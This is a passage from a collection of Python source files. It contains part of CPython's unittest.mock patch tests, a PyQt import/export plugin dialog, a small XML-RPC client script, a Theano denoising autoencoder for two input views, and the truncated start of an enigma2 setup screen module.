self.assertEqual(foo.fish, 'tasty')
@patch('unittest.mock.patch.TEST_PREFIX', 'foo')
def test_patch_test_prefix(self):
class Foo(object):
thing = 'original'
def foo_one(self):
return self.thing
def foo_two(self):
return self.thing
def test_one(self):
return self.thing
def test_two(self):
return self.thing
Foo = patch.object(Foo, 'thing', 'changed')(Foo)
foo = Foo()
self.assertEqual(foo.foo_one(), 'changed')
self.assertEqual(foo.foo_two(), 'changed')
self.assertEqual(foo.test_one(), 'original')
self.assertEqual(foo.test_two(), 'original')
@patch('unittest.mock.patch.TEST_PREFIX', 'bar')
def test_patch_dict_test_prefix(self):
    """With TEST_PREFIX patched to 'bar', patch.dict as a class
    decorator must wrap only the bar_* methods; test_* methods see the
    unpatched dict."""
    class Foo(object):
        def bar_one(self):
            return dict(the_dict)
        def bar_two(self):
            return dict(the_dict)
        def test_one(self):
            return dict(the_dict)
        def test_two(self):
            return dict(the_dict)

    the_dict = {'key': 'original'}
    Foo = patch.dict(the_dict, key='changed')(Foo)

    foo = Foo()
    # Only the methods matching the patched prefix observe the change.
    self.assertEqual(foo.bar_one(), {'key': 'changed'})
    self.assertEqual(foo.bar_two(), {'key': 'changed'})
    self.assertEqual(foo.test_one(), {'key': 'original'})
    self.assertEqual(foo.test_two(), {'key': 'original'})
def test_patch_with_spec_mock_repr(self):
for arg in ('spec', 'autospec', 'spec_set'):
p = patch('%s.SomeClass' % __name__, **{arg: True})
m = p.start()
try:
self.assertIn(" name='SomeClass'", repr(m))
self.assertIn(" name='SomeClass.class_attribute'",
repr(m.class_attribute))
self.assertIn(" name='SomeClass()'", repr(m()))
self.assertIn(" name='SomeClass().class_attribute'",
repr(m().class_attribute))
finally:
p.stop()
def test_patch_nested_autospec_repr(self):
with patch('unittest.test.testmock.support', autospec=True) as m:
self.assertIn(" name='support.SomeClass.wibble()'",
repr(m.SomeClass.wibble()))
self.assertIn(" name='support.SomeClass().wibble()'",
repr(m.SomeClass().wibble()))
def test_mock_calls_with_patch(self):
for arg in ('spec', 'autospec', 'spec_set'):
p = patch('%s.SomeClass' % __name__, **{arg: True})
m = p.start()
try:
m.wibble()
kalls = [call.wibble()]
self.assertEqual(m.mock_calls, kalls)
self.assertEqual(m.method_calls, kalls)
self.assertEqual(m.wibble.mock_calls, [call()])
result = m()
kalls.append(call())
self.assertEqual(m.mock_calls, kalls)
result.wibble()
kalls.append(call().wibble())
self.assertEqual(m.mock_calls, kalls)
self.assertEqual(result.mock_calls, [call.wibble()])
self.assertEqual(result.wibble.mock_calls, [call()])
self.assertEqual(result.method_calls, [call.wibble()])
finally:
p.stop()
def test_patch_imports_lazily(self):
p1 = patch('squizz.squozz')
self.assertRaises(ImportError, p1.start)
with uncache('squizz'):
squizz = Mock()
sys.modules['squizz'] = squizz
squizz.squozz = 6
p1 = patch('squizz.squozz')
squizz.squozz = 3
p1.start()
p1.stop()
self.assertEqual(squizz.squozz, 3)
def test_patch_propogrates_exc_on_exit(self):
    """A custom _patch subclass overriding __exit__ still receives the
    exception raised inside the patched function.

    (The 'propogrates' typo in the method name is kept deliberately so
    the test id stays stable for anyone selecting tests by name.)
    """
    class holder:
        # Captured (etype, value, traceback) from the custom __exit__.
        exc_info = None, None, None

    class custom_patch(_patch):
        def __exit__(self, etype=None, val=None, tb=None):
            _patch.__exit__(self, etype, val, tb)
            holder.exc_info = etype, val, tb
        stop = __exit__

    def with_custom_patch(target):
        getter, attribute = _get_target(target)
        return custom_patch(
            getter, attribute, DEFAULT, None, False, None,
            None, None, {}
        )

    @with_custom_patch('squizz.squozz')
    def test(mock):
        raise RuntimeError

    with uncache('squizz'):
        squizz = Mock()
        sys.modules['squizz'] = squizz

        self.assertRaises(RuntimeError, test)

    self.assertIs(holder.exc_info[0], RuntimeError)
    self.assertIsNotNone(holder.exc_info[1],
                         'exception value not propagated')
    self.assertIsNotNone(holder.exc_info[2],
                         'exception traceback not propagated')
def test_create_and_specs(self):
for kwarg in ('spec', 'spec_set', 'autospec'):
p = patch('%s.doesnotexist' % __name__, create=True,
**{kwarg: True})
self.assertRaises(TypeError, p.start)
self.assertRaises(NameError, lambda: doesnotexist)
# check that spec with create is innocuous if the original exists
p = patch(MODNAME, create=True, **{kwarg: True})
p.start()
p.stop()
def test_multiple_specs(self):
original = PTModule
for kwarg in ('spec', 'spec_set'):
p = patch(MODNAME, autospec=0, **{kwarg: 0})
self.assertRaises(TypeError, p.start)
self.assertIs(PTModule, original)
for kwarg in ('spec', 'autospec'):
p = patch(MODNAME, spec_set=0, **{kwarg: 0})
self.assertRaises(TypeError, p.start)
self.assertIs(PTModule, original)
for kwarg in ('spec_set', 'autospec'):
p = patch(MODNAME, spec=0, **{kwarg: 0})
self.assertRaises(TypeError, p.start)
self.assertIs(PTModule, original)
def test_specs_false_instead_of_none(self):
p = patch(MODNAME, spec=False, spec_set=False, autospec=False)
mock = p.start()
try:
# no spec should have been set, so attribute access should not fail
mock.does_not_exist
mock.does_not_exist = 3
finally:
p.stop()
def test_falsey_spec(self):
for kwarg in ('spec', 'autospec', 'spec_set'):
p = patch(MODNAME, **{kwarg: 0})
m = p.start()
try:
self.assertRaises(AttributeError, getattr, m, 'doesnotexit')
finally:
p.stop()
def test_spec_set_true(self):
for kwarg in ('spec', 'autospec'):
p = patch(MODNAME, spec_set=True, **{kwarg: True})
m = p.start()
try:
self.assertRaises(AttributeError, setattr, m,
'doesnotexist', 'something')
self.assertRaises(AttributeError, getattr, m, 'doesnotexist')
finally:
p.stop()
def test_callable_spec_as_list(self):
spec = ('__call__',)
p = patch(MODNAME, spec=spec)
m = p.start()
try:
self.assertTrue(callable(m))
finally:
p.stop()
def test_not_callable_spec_as_list(self):
spec = ('foo', 'bar')
p = patch(MODNAME, spec=spec)
m = p.start()
try:
self.assertFalse(callable(m))
finally:
p.stop()
def test_patch_stopall(self):
unlink = os.unlink
chdir = os.chdir
path = os.path
patch('os.unlink', something).start()
patch('os.chdir', something_else).start()
@patch('os.path')
def patched(mock_path):
patch.stopall()
self.assertIs(os.path, mock_path)
self.assertIs(os.unlink, unlink)
self.assertIs(os.chdir, chdir)
patched()
self.assertIs(os.path, path)
def test_stopall_lifo(self):
stopped = []
class thing(object):
one = two = three = None
def get_patch(attribute):
class mypatch(_patch):
def stop(self):
stopped.append(attribute)
return super(mypatch, self).stop()
return mypatch(lambda: thing, attribute, None, None,
False, None, None, None, {})
[get_patch(val).start() for val in ("one", "two", "three")]
patch.stopall()
self.assertEqual(stopped, ["three", "two", "one"])
def test_special_attrs(self):
def foo(x=0):
"""TEST"""
return x
with patch.object(foo, '__defaults__', (1, )):
self.assertEqual(foo(), 1)
self.assertEqual(foo(), 0)
with patch.object(foo, '__doc__', "FUN"):
self.assertEqual(foo.__doc__, "FUN")
self.assertEqual(foo.__doc__, "TEST")
with patch.object(foo, '__module__', "testpatch2"):
self.assertEqual(foo.__module__, "testpatch2")
self.assertEqual(foo.__module__, 'unittest.test.testmock.testpatch')
with patch.object(foo, '__annotations__', dict([('s', 1, )])):
self.assertEqual(foo.__annotations__, dict([('s', 1, )]))
self.assertEqual(foo.__annotations__, dict())
def foo(*a, x=0):
return x
with patch.object(foo, '__kwdefaults__', dict([('x', 1, )])):
self.assertEqual(foo(), 1)
self.assertEqual(foo(), 0)
# Allow running this test module directly: `python testpatch.py`.
if __name__ == '__main__':
    unittest.main()
| FFMG/myoddweb.piger | monitor/api/python/Python-3.7.2/Lib/unittest/test/testmock/testpatch.py | Python | gpl-2.0 | 55,727 |
# -* coding: utf-8 *-
from PyQt4 import QtGui
from collector.ui.gen.im_export import Ui_Dialog
from collector.ui.views import Dialog
from collector.ui.helpers.customtoolbar import CustomToolbar
from collector.core.controller import get_manager
from collector.core.plugin import PluginExporter, PluginImporter
import logging
class BaseDialog(QtGui.QDialog, Ui_Dialog):
    """
    BaseDialog
    ----------
    Common parts for ImportDialog and ExportDialog.

    Subclasses set ``filter_`` to a plugin base class (importer or
    exporter); the dialog then shows one toolbar entry per matching
    plugin and runs whichever one the user picks.
    """

    def __init__(self, parent=None):
        super(BaseDialog, self).__init__(parent)
        self.setupUi(self)
        self.customize()

    def customize(self):
        """Populate the toolbar with one link entry per available plugin.

        When no plugin matches ``filter_`` the toolbar is hidden and the
        explanatory "no plugins" label is shown instead.
        """
        self.label_noplugins.hide()
        plugins = self.get_plugins()
        man = get_manager('plugin')
        items = []
        for plugin_id in plugins:
            plugin = man.get(plugin_id)
            items.append(
                {'class': 'link', 'name': plugin.get_name(),
                 'path': 'plugin/' + plugin.get_id(),
                 'image': plugin.icon}
            )
        # Trailing spacer keeps the plugin entries packed together.
        items.append({'class': 'spacer'})
        CustomToolbar(self.toolbar, items, self.select_plugin)
        if not plugins:
            self.toolbar.hide()
            self.label_noplugins.show()

    def select_plugin(self, uri):
        """Toolbar callback: resolve *uri* and run the chosen plugin.

        Closes the dialog with 1 on success and -1 when the plugin
        raises; the exception is logged rather than propagated so the
        UI survives a misbehaving plugin.
        """
        params = self.parent().collector_uri_call(uri)
        if params is not None:
            plugin = params.get('plugin', None)
            if plugin is not None:
                man = get_manager('plugin')
                self.hide()
                try:
                    man.get(plugin).run()
                    self.done(1)
                except Exception as exc:
                    logging.exception(exc)
                    self.done(-1)

    def get_plugins(self):
        """Return the ids of the plugins matching the subclass filter."""
        return get_manager('plugin').filter(self.filter_)
class ExportDialog(BaseDialog):
    """
    ExportDialog
    ------------
    BaseDialog restricted to exporter plugins, titled "Export".
    """
    # TODO: flesh out export-specific behaviour beyond the title.
    filter_ = PluginExporter
    def customize(self):
        # Reuse the common toolbar setup, then set the export title.
        super(ExportDialog, self).customize()
        self.setWindowTitle(self.tr("Export"))
class ImportDialog(BaseDialog):
    """
    ImportDialog
    ------------
    BaseDialog restricted to importer plugins, titled "Import".
    """
    filter_ = PluginImporter
    def customize(self):
        # Reuse the common toolbar setup, then set the import title.
        super(ImportDialog, self).customize()
        self.setWindowTitle(self.tr("Import"))
class ImportView(Dialog):
    """Dialog view that opens the import dialog."""
    def get_widget(self, params):
        # ``params`` is unused; the dialog gathers its own state.
        return ImportDialog(self.parent)
class ExportView(Dialog):
    """Dialog view that opens the export dialog."""
    def get_widget(self, params):
        # ``params`` is unused; the dialog gathers its own state.
        return ExportDialog(self.parent)
| arielvb/collector | collector/ui/views/im_export.py | Python | gpl-2.0 | 2,612 |
#!/usr/bin/python
import xmlrpc.client
from time import sleep
def remoteCall(func, *args):
    """Invoke *func* with *args*, absorbing XML-RPC faults.

    Returns the call's result, or None when the server reports an
    ``xmlrpc.client.Fault`` (the fault is printed for diagnostics).
    Any other exception propagates to the caller.
    """
    try:
        return func(*args)
    except xmlrpc.client.Fault as e:
        # Server-side fault: report it and signal failure explicitly
        # (the original fell off the end and returned None implicitly).
        print(e)
        return None
# Connect to the local XML-RPC music server (allow_none so the server may
# return None values over the wire).
server = xmlrpc.client.ServerProxy("https://localhost:8080", allow_none=True)
# Authenticate once and reuse the session id for the following calls.
sid = remoteCall(server.login, "dj", "abc123")
print(remoteCall(server.getfoo, sid))
sleep(3)
print(remoteCall(server.getfoo, sid))
sleep(6)
# NOTE(review): the growing delays presumably exercise the server's session
# timeout -- confirm against the server's configuration.
print(remoteCall(server.getfoo, sid))
| bitbyt3r/musicserver | start.py | Python | gpl-2.0 | 459 |
"""
This tutorial introduces denoising auto-encoders (dA) using Theano.
Denoising autoencoders are the building blocks for SdA.
They are based on auto-encoders as the ones used in Bengio et al. 2007.
An autoencoder takes an input x and first maps it to a hidden representation
y = f_{\theta}(x) = s(Wx+b), parameterized by \theta={W,b}. The resulting
latent representation y is then mapped back to a "reconstructed" vector
z \in [0,1]^d in input space z = g_{\theta'}(y) = s(W'y + b'). The weight
matrix W' can optionally be constrained such that W' = W^T, in which case
the autoencoder is said to have tied weights. The network is trained such
that to minimize the reconstruction error (the error between x and z).
For the denosing autoencoder, during training, first x is corrupted into
\tilde{x}, where \tilde{x} is a partially destroyed version of x by means
of a stochastic mapping. Afterwards y is computed as before (using
\tilde{x}), y = s(W\tilde{x} + b) and z as s(W'y + b'). The reconstruction
error is now measured between z and the uncorrupted input x, which is
computed as the cross-entropy :
- \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)]
References :
- P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and
Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103,
2008
- Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise
Training of Deep Networks, Advances in Neural Information Processing
Systems 19, 2007
"""
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
from logistic_sgd import load_data
from utils import tile_raster_images, load_vc
try:
import PIL.Image as Image
except ImportError:
import Image
try:
from matplotlib import pyplot as pp
except ImportError:
print 'matplotlib is could not be imported'
# start-snippet-1
class dA_joint(object):
    """Denoising Auto-Encoder class (dA) over two coupled input views.

    A denoising autoencoders tries to reconstruct the input from a corrupted
    version of it by projecting it first in a latent space and reprojecting
    it afterwards back in the input space. Please refer to Vincent et al.,2008
    for more details. If x is the input then equation (1) computes a partially
    destroyed version of x by means of a stochastic mapping q_D. Equation (2)
    computes the projection of the input into the latent space. Equation (3)
    computes the reconstruction of the input, while equation (4) computes the
    reconstruction error.
    .. math::
        \tilde{x} ~ q_D(\tilde{x}|x)                                     (1)
        y = s(W \tilde{x} + b)                                           (2)
        x = s(W' y  + b')                                                (3)
        L(x,z) = -sum_{k=1}^d [x_k \log z_k + (1-x_k) \log( 1-z_k)]      (4)

    This variant maintains TWO tied-weight autoencoders (W1/b1 for view 1,
    W2/b2 for view 2) so their hidden codes can be coupled.
    """
    def __init__(
        self,
        numpy_rng,
        theano_rng=None,
        input1=None,
        input2=None,
        cor_reg=None,
        n_visible1=784/2,
        n_visible2=784/2,
        n_hidden=500,
        W1=None,
        bhid1=None,
        bvis1=None,
        W2=None,
        bhid2=None,
        bvis2=None
    ):
        """
        Initialize the dA class by specifying the number of visible units (the
        dimension d of the input ), the number of hidden units ( the dimension
        d' of the latent or hidden space ) and the corruption level. The
        constructor also receives symbolic variables for the input, weights and
        bias. Such a symbolic variables are useful when, for example the input
        is the result of some computations, or when weights are shared between
        the dA and an MLP layer. When dealing with SdAs this always happens,
        the dA on layer 2 gets as input the output of the dA on layer 1,
        and the weights of the dA are used in the second stage of training
        to construct an MLP.
        :type numpy_rng: numpy.random.RandomState
        :param numpy_rng: number random generator used to generate weights
        :type theano_rng: theano.tensor.shared_randomstreams.RandomStreams
        :param theano_rng: Theano random generator; if None is given one is
                     generated based on a seed drawn from `rng`
        :type input: theano.tensor.TensorType
        :param input: a symbolic description of the input or None for
                      standalone dA
        :type n_visible: int
        :param n_visible: number of visible units
        :type n_hidden: int
        :param n_hidden:  number of hidden units
        :type W: theano.tensor.TensorType
        :param W: Theano variable pointing to a set of weights that should be
                  shared belong the dA and another architecture; if dA should
                  be standalone set this to None
        :type bhid: theano.tensor.TensorType
        :param bhid: Theano variable pointing to a set of biases values (for
                     hidden units) that should be shared belong dA and another
                     architecture; if dA should be standalone set this to None
        :type bvis: theano.tensor.TensorType
        :param bvis: Theano variable pointing to a set of biases values (for
                     visible units) that should be shared belong dA and another
                     architecture; if dA should be standalone set this to None
        """
        self.n_visible1 = n_visible1
        self.n_visible2 = n_visible2
        self.n_hidden = n_hidden
        # create a Theano random generator that gives symbolic random values
        if not theano_rng:
            theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
        # note : W' was written as `W_prime` and b' as `b_prime`
        if not W1:
            # W is initialized with `initial_W` which is uniformely sampled
            # from -4*sqrt(6./(n_visible+n_hidden)) and
            # 4*sqrt(6./(n_hidden+n_visible))the output of uniform if
            # converted using asarray to dtype
            # theano.config.floatX so that the code is runable on GPU
            initial_W1 = numpy.asarray(
                numpy_rng.uniform(
                    low=-4 * numpy.sqrt(6. / (n_hidden + n_visible1)),
                    high=4 * numpy.sqrt(6. / (n_hidden + n_visible1)),
                    size=(n_visible1, n_hidden)
                ),
                dtype=theano.config.floatX
            )
            W1 = theano.shared(value=initial_W1, name='W1', borrow=True)
        if not W2:
            # W is initialized with `initial_W` which is uniformely sampled
            # from -4*sqrt(6./(n_visible+n_hidden)) and
            # 4*sqrt(6./(n_hidden+n_visible))the output of uniform if
            # converted using asarray to dtype
            # theano.config.floatX so that the code is runable on GPU
            initial_W2 = numpy.asarray(
                numpy_rng.uniform(
                    low=-4 * numpy.sqrt(6. / (n_hidden + n_visible2)),
                    high=4 * numpy.sqrt(6. / (n_hidden + n_visible2)),
                    size=(n_visible2, n_hidden)
                ),
                dtype=theano.config.floatX
            )
            W2 = theano.shared(value=initial_W2, name='W2', borrow=True)
        if not bvis1:
            bvis1 = theano.shared(
                value=numpy.zeros(
                    n_visible1,
                    dtype=theano.config.floatX
                ),
                name='b1p',
                borrow=True
            )
        if not bvis2:
            bvis2 = theano.shared(
                value=numpy.zeros(
                    n_visible2,
                    dtype=theano.config.floatX
                ),
                name='b2p',
                borrow=True
            )
        if not bhid1:
            bhid1 = theano.shared(
                value=numpy.zeros(
                    n_hidden,
                    dtype=theano.config.floatX
                ),
                name='b1',
                borrow=True
            )
        if not bhid2:
            bhid2 = theano.shared(
                value=numpy.zeros(
                    n_hidden,
                    dtype=theano.config.floatX
                ),
                name='b2',
                borrow=True
            )
        self.W1 = W1
        self.W2 = W2
        # b corresponds to the bias of the hidden
        self.b1 = bhid1
        self.b2 = bhid2
        # b_prime corresponds to the bias of the visible
        self.b1_prime = bvis1
        self.b2_prime = bvis2
        # tied weights, therefore W_prime is W transpose
        self.W1_prime = self.W1.T
        self.W2_prime = self.W2.T
        self.theano_rng = theano_rng
        # L1/L2 penalties over the encoder weights only (bias terms were
        # deliberately left commented out by the author).
        self.L1 = (
            abs(self.W1).sum()+abs(self.W2).sum()#+abs(self.b1).sum()+abs(self.b2).sum()+abs(self.b1_prime).sum()+abs(self.b2_prime).sum()
        )
        self.L2_sqr = (
            (self.W1**2).sum()#+(self.W2**2).sum()#+abs(self.b1**2).sum()+abs(self.b2**2).sum()+abs(self.b1_prime**2).sum()+abs(self.b2_prime**2).sum()
        )
        # if no input is given, generate a variable representing the input
        if input1 is None:
            # we use a matrix because we expect a minibatch of several
            # examples, each example being a row
            self.x1 = T.dmatrix(name='input1')
            self.x2 = T.dmatrix(name='input2')
        else:
            self.x1 = input1
            self.x2 = input2
        self.params = [self.W1, self.b1, self.b1_prime,
                       self.W2, self.b2, self.b2_prime
                       ]
        # end-snippet-1
        # Deterministic (uncorrupted) codes and reconstructions of each
        # view; tanh activations throughout, decoders use tied weights.
        self.output1 = T.tanh(T.dot(self.x1, self.W1) + self.b1)
        self.output2 = T.tanh(T.dot(self.x2, self.W2) + self.b2)
        self.rec1 = T.tanh(T.dot(self.output1, self.W1_prime) + self.b1_prime)
        self.rec2 = T.tanh(T.dot(self.output2, self.W2_prime) + self.b2_prime)
        # Cross-domain mapping: decode view-1's code with view-2's decoder.
        self.reg = T.tanh(T.dot(self.output1, self.W2_prime) + self.b2_prime)
        # Shared scalar weighting the code-coupling penalty.
        # NOTE(review): this shadows the ``cor_reg`` constructor argument,
        # which is otherwise unused -- confirm that is intentional.
        self.cor_reg = theano.shared(numpy.float32(1.0),name='reg')
    def get_corrupted_input(self, input1, input2, corruption_level):
        """This function keeps ``1-corruption_level`` entries of the inputs the
        same and zero-out randomly selected subset of size ``coruption_level``
        Note : first argument of theano.rng.binomial is the shape(size) of
               random numbers that it should produce
               second argument is the number of trials
               third argument is the probability of success of any trial
                this will produce an array of 0s and 1s where 1 has a
                probability of 1 - ``corruption_level`` and 0 with
                ``corruption_level``
                The binomial function return int64 data type by
                default.  int64 multiplicated by the input
                type(floatX) always return float64.  To keep all data
                in floatX when floatX is float32, we set the dtype of
                the binomial to floatX. As in our case the value of
                the binomial is always 0 or 1, this don't change the
                result. This is needed to allow the gpu to work
                correctly as it only support float32 for now.
        """
        # The same corruption level is applied independently to both views.
        a=self.theano_rng.binomial(size=input1.shape, n=1,
                                   p=1 - corruption_level,
                                   dtype=theano.config.floatX) * input1
        b=self.theano_rng.binomial(size=input2.shape, n=1,
                                   p=1 - corruption_level,
                                   dtype=theano.config.floatX) * input2
        return a,b
    def get_hidden_values(self, input1, input2):
        """ Computes the values of the hidden layer """
        return T.tanh(T.dot(input1, self.W1) + self.b1), T.tanh(T.dot(input2, self.W2) + self.b2)
    def get_reconstructed_input(self, hidden1, hidden2):
        """Computes the reconstructed input given the values of the
        hidden layer
        """
        a = T.tanh(T.dot(hidden1, self.W1_prime) + self.b1_prime)
        b = T.tanh(T.dot(hidden2, self.W2_prime) + self.b2_prime)
        return a, b
    def get_cost_updates(self, corruption_level, learning_rate):
        """ This function computes the cost and the updates for one trainng
        step of the dA """
        tilde_x1, tilde_x2 = self.get_corrupted_input(self.x1, self.x2, corruption_level)
        y1, y2 = self.get_hidden_values(tilde_x1, tilde_x2)
        z1, z2 = self.get_reconstructed_input(y1, y2)
        # note : we sum over the size of a datapoint; if we are using
        #        minibatches, L will be a vector, with one entry per
        #        example in minibatch
        L_x1 = - T.sum(self.x1 * T.log(z1) + (1 - self.x1) * T.log(1 - z1), axis=1)
        L_x2 = - T.sum(self.x2 * T.log(z2) + (1 - self.x2) * T.log(1 - z2), axis=1)
        L_X1_x2 = - T.sum(y1 * T.log(y2) + (1 - y1) * T.log(1 - y2), axis=1)
        L_X2_x1 = - T.sum(y2 * T.log(y1) + (1 - y2) * T.log(1 - y1), axis=1)
        #L_X1_x2 = T.mean(T.mean((y1-y2)**2,1))
        # NOTE(review): the cross-entropy expressions above are dead code --
        # they are immediately overwritten by the squared-error versions
        # below (and tanh outputs in [-1, 1] would make T.log(z) invalid).
        L_x1 = T.mean((z1-self.x1)**2) #+ (1 - self.x1) * T.log(1 - z1), axis=1)
        L_x2 = T.mean((z2-self.x2)**2)
        L_X1_x2 = T.mean((y1-y2)**2)
        ##cost = T.mean(L_x1) + T.mean(L_x2) + self.cor_reg*T.mean(L_X1_x2)+0.001*self.L1+001*self.L2_sqr# + 0.2*T.mean(L_X2_x1)
        # Current objective: plain reconstruction of both views; the code
        # coupling and weight regularisation terms are kept commented out.
        cost = T.mean(L_x1) + T.mean(L_x2) #+ T.mean(L_X1_x2) #+ .001*self.L2_sqr# + 0.2*T.mean(L_X2_x1)
        # compute the gradients of the cost of the `dA` with respect
        # to its parameters
        gparams = T.grad(cost, self.params)
        # generate the list of updates
        updates = [
            (param, param - learning_rate * gparam)
            for param, gparam in zip(self.params, gparams)
        ]
        return (cost, updates)
def test_dA(learning_rate=0.01, training_epochs=15000,
dataset='mnist.pkl.gz',
batch_size=5, output_folder='dA_plots'):
"""
This demo is tested on MNIST
:type learning_rate: float
:param learning_rate: learning rate used for training the DeNosing
AutoEncoder
:type training_epochs: int
:param training_epochs: number of epochs used for training
:type dataset: string
:param dataset: path to the picked dataset
"""
##datasets = load_data(dataset)
#from SdA_mapping import load_data_half
#datasets = load_data_half(dataset)
print 'loading data'
datasets, x_mean, y_mean, x_std, y_std = load_vc()
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
print 'loaded data'
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
x1 = T.matrix('x1') # the data is presented as rasterized images
x2 = T.matrix('x2') # the data is presented as rasterized images
cor_reg = T.scalar('cor_reg')
if not os.path.isdir(output_folder):
os.makedirs(output_folder)
os.chdir(output_folder)
####################################
# BUILDING THE MODEL NO CORRUPTION #
####################################
rng = numpy.random.RandomState(123)
theano_rng = RandomStreams(rng.randint(2 ** 30))
#da = dA_joint(
#numpy_rng=rng,
#theano_rng=theano_rng,
#input1=x1,
#input2=x2,
#n_visible1=28 * 28/2,
#n_visible2=28 * 28/2,
#n_hidden=500
#)
print 'initialize functions'
da = dA_joint(
numpy_rng=rng,
theano_rng=theano_rng,
input1=x1,
input2=x2,
cor_reg=cor_reg,
#n_visible1=28 * 28/2,
#n_visible2=28 * 28/2,
n_visible1=24,
n_visible2=24,
n_hidden=50
)
cost, updates = da.get_cost_updates(
corruption_level=0.3,
learning_rate=learning_rate
)
cor_reg_val = numpy.float32(5.0)
train_da = theano.function(
[index],
cost,
updates=updates,
givens={
x1: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
fprop_x1 = theano.function(
[],
outputs=da.output1,
givens={
x1: test_set_x
},
name='fprop_x1'
)
fprop_x2 = theano.function(
[],
outputs=da.output2,
givens={
x2: test_set_y
},
name='fprop_x2'
)
fprop_x1t = theano.function(
[],
outputs=da.output1,
givens={
x1: train_set_x
},
name='fprop_x1'
)
fprop_x2t = theano.function(
[],
outputs=da.output2,
givens={
x2: train_set_y
},
name='fprop_x2'
)
rec_x1 = theano.function(
[],
outputs=da.rec1,
givens={
x1: test_set_x
},
name='rec_x1'
)
rec_x2 = theano.function(
[],
outputs=da.rec2,
givens={
x2: test_set_y
},
name='rec_x2'
)
fprop_x1_to_x2 = theano.function(
[],
outputs=da.reg,
givens={
x1: test_set_x
},
name='fprop_x12x2'
)
updates_reg = [
(da.cor_reg, da.cor_reg+theano.shared(numpy.float32(0.1)))
]
update_reg = theano.function(
[],
updates=updates_reg
)
print 'initialize functions ended'
start_time = time.clock()
############
# TRAINING #
############
print 'training started'
X1=test_set_x.eval()
X1 *= x_std
X1 += x_mean
X2=test_set_y.eval()
X2 *= y_std
X2 += y_mean
from dcca_numpy import cor_cost
# go through training epochs
for epoch in xrange(training_epochs):
# go through trainng set
c = []
for batch_index in xrange(n_train_batches):
c.append(train_da(batch_index))
#cor_reg_val += 1
#da.cor_reg = theano.shared(cor_reg_val)
update_reg()
X1H=rec_x1()
X2H=rec_x2()
X1H *= x_std
X1H += x_mean
X2H *= y_std
X2H += y_mean
H1=fprop_x1()
H2=fprop_x2()
print 'Training epoch'
print 'Reconstruction ', numpy.mean(numpy.mean((X1H-X1)**2,1)),\
numpy.mean(numpy.mean((X2H-X2)**2,1))
if epoch%5 == 2 : # pretrain middle layer
print '... pre-training MIDDLE layer'
H1t=fprop_x1t()
H2t=fprop_x2t()
h1 = T.matrix('x') # the data is presented as rasterized images
h2 = T.matrix('y') # the labels are presented as 1D vector of
from mlp import HiddenLayer
numpy_rng = numpy.random.RandomState(89677)
log_reg = HiddenLayer(numpy_rng, h1, 50, 50, activation=T.tanh)
if 1: # for middle layer
learning_rate = 0.1
#H1=theano.shared(H1)
#H2=theano.shared(H2)
# compute the gradients with respect to the model parameters
logreg_cost = log_reg.mse(h2)
gparams = T.grad(logreg_cost, log_reg.params)
# compute list of fine-tuning updates
updates = [
(param, param - gparam * learning_rate)
for param, gparam in zip(log_reg.params, gparams)
]
train_fn_middle = theano.function(
inputs=[],
outputs=logreg_cost,
updates=updates,
givens={
h1: theano.shared(H1t),
h2: theano.shared(H2t)
},
name='train_middle'
)
epoch = 0
while epoch < 100:
print epoch, train_fn_middle()
epoch += 1
##X2H=fprop_x1_to_x2()
X2H=numpy.tanh(H1.dot(log_reg.W.eval())+log_reg.b.eval())
X2H=numpy.tanh(X2H.dot(da.W2_prime.eval())+da.b2_prime.eval())
X2H *= y_std
X2H += y_mean
print 'Regression ', numpy.mean(numpy.mean((X2H-X2)**2,1))
print 'Correlation ', cor_cost(H1, H2)
end_time = time.clock()
training_time = (end_time - start_time)
print >> sys.stderr, ('The no corruption code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((training_time) / 60.))
image = Image.fromarray(
tile_raster_images(X=da.W1.get_value(borrow=True).T,
img_shape=(28, 14), tile_shape=(10, 10),
tile_spacing=(1, 1)))
image.save('filters_corruption_0.png')
from matplotlib import pyplot as pp
pp.plot(H1[:10,:2],'b');pp.plot(H2[:10,:2],'r');pp.show()
print cor
if __name__ == '__main__':
test_dA() | shamidreza/deepcca | dA_joint.py | Python | gpl-2.0 | 21,666 |
from Screen import Screen
from Components.ActionMap import NumberActionMap
from Components.config import config, ConfigNothing, ConfigBoolean, ConfigSelection
from Components.Label import Label
from Components.SystemInfo import SystemInfo
from Components.ConfigList import ConfigListScreen
from Components.Pixmap import Pixmap
from Components.Sources.StaticText import StaticText
from Components.Sources.Boolean import Boolean
from enigma import eEnv
import xml.etree.cElementTree
# FIXME: use resolveFile!
# read the setupmenu
# Parse setup.xml once at import time; ``setupdom`` is shared by
# getConfigMenuItem, Setup and getSetupTitle below.
try:
    # first we search in the current path
    setupfile = file('data/setup.xml', 'r')
except:
    # if not found in the current path, we use the global datadir-path
    # NOTE(review): the bare except also hides permission/IO errors on the
    # local file, not just "file not found".
    setupfile = file(eEnv.resolve('${datadir}/enigma2/setup.xml'), 'r')
setupdom = xml.etree.cElementTree.parse(setupfile)
setupfile.close()
def getConfigMenuItem(configElement):
    """Look up *configElement* (a dotted config path string such as
    ``config.usage.setup_level``) among the setup.xml items and return a
    ``(translated_label, config_object)`` pair, or ``("", None)`` when no
    setup item references that path."""
    for item in setupdom.getroot().findall('./setup/item/.'):
        if item.text == configElement:
            # NOTE(review): ``eval`` executes the path text; this assumes
            # setup.xml is trusted content shipped with the image.
            return _(item.attrib["text"]), eval(configElement)
    return "", None
class SetupError(Exception):
    """Raised when a setup screen cannot be resolved (e.g. unknown id).

    Keeps the legacy ``msg`` attribute for existing callers while also
    initialising the base Exception so that ``e.args``, ``repr(e)`` and
    pickling behave normally (the original skipped Exception.__init__).
    """
    def __init__(self, message):
        super(SetupError, self).__init__(message)
        self.msg = message

    def __str__(self):
        # Preserved for backward compatibility; equivalent to the base
